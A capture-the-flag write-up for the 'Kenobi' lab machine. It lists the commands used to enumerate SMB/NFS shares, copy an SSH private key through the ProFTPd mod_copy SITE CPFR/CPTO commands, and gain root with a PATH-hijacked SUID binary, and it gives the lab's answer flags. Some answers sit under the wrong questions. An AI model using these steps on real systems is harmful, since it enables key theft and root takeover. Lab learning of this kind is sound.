# Kenobi

> Shay Pasvolsky
> Started: 05/10/20 09-34-02
> Finished: 05/10/20 10-27-00

---

---

## General info

```bash
export MIP=10.10.83.7
export MyIP=10.9.134.47
```

### Users

```txt
    User:
        Password:
```

### Open Ports

```txt
    port:
        type: tcp, udp, tcp6, udp6
        service:
            version:
            Has Vuln:
```

---

## Tasks

### Task 1

1. Make sure you're connected to our network and deploy the machine

    ```txt
        Hit 'Completed'
    ```

2. Scan the machine with nmap, how many ports are open?

    ```bash
        sudo nmap -sC -sV-vvv --script vuln -oV scans/local/nmap/withvulns $MIP
    ```

    ```txt
        7
    ```

### Task 2

1. Using nmap we can enumerate a machine for SMB shares.

    ```bash
        sudo nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse $MIP -oN scans/local/nmap/p445-enum
    ```

    ```txt
        3
    ```

2. On most distributions of Linux smbclient is already installed. Lets inspect one of the shares.

    ```bash
        smbclient //$MIP/anonymous
        ret
        ls
        get log.txt
    ```

    ```txt
        log.txt
    ```

3. You can recursively download the SMB share too. Submit the username and password as nothing.

    ```bash
        smbget -R smb://$MIP/anonymous
    ```

    ```txt
        21
    ```

4. Your earlier nmap port scan will have shown port 111 running the service rpcbind. This is just an server that converts remote procedure call (RPC) program number into universal addresses. When an RPC service is started, it tells rpcbind the address at which it is listening and the RPC program number its prepared to serve.

    ```bash
        sudo nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount $MIP -oN scans/local/nmap/p111-enum
    ```

    ```txt
        /var
    ```

### Task 3

1. Lets get the version of ProFtpd. Use netcat to connect to the machine on the FTP port.

    What is the version?

    ```bash
    ```

    ```txt
    ```

2. We can use searchsploit to find exploits for a particular software version.

    Searchsploit is basically just a command line search tool for exploit-db.com.

    How many exploits are there for the ProFTPd running?

    ```bash
    ```

    ```txt
        1.3.5
    ```

3. You should have found an exploit from ProFtpd's mod_copy module.

    ```bash
        searchsploit proftpd 1.3.5
    ```

    ```txt
        3
    ```

4. We're now going to copy Kenobi's private key using SITE CPFR and SITE CPTO commands.

    ```bash
        nc $MIP 21
        SITE CPFR /home/kenobi/.ssh/id_rsa
        SITE CPTO /var/tmp/id_rsa
    ```

    ```txt
        Hit 'Completed'
    ```

5. Lets mount the /var/tmp directory to our machine

    ```bash
        mkdir mounted
        sudo mount $MIP:/var mounted/
        ls -la mounted/
    ```

    ```txt
        d0b0f3f53b6caa532a83915e19224899
    ```

### Task 4

1. SUID bits can be dangerous, some binaries such as passwd need to be run with elevated privileges (as its resetting your password on the system), however other custom files could that have the SUID bit can lead to all sorts of issues.

    To search the a system for these type of files run the following: find / -perm -u=s -type f 2>/dev/null

    What file looks particularly out of the ordinary?

    ```bash
        find / -perm -u=s -type f 2>/dev/null
    ```

    ```txt
        /usr/bin/menu
    ```

2. Run the binary, how many options appear?

    ```bash
        /usr/bin/menu
    ```

    ```txt
        3
    ```

3. Strings is a command on Linux that looks for human readable strings on a binary.

    ```txt
        Hit 'Completed'
    ```

4. What is the root flag (/root/root.txt)?

    ```bash
        export PATH=/tmp:$PATH
        echo /bin/sh > /tmp/curl
        chmod 777 /tmp/curl
        /usr/bin/menu
        1
        whoami
        find / -name root.txt
        cat /root/root.txt
    ```

    ```txt
        177b3cd8562289f37382721c28381f02
    ```
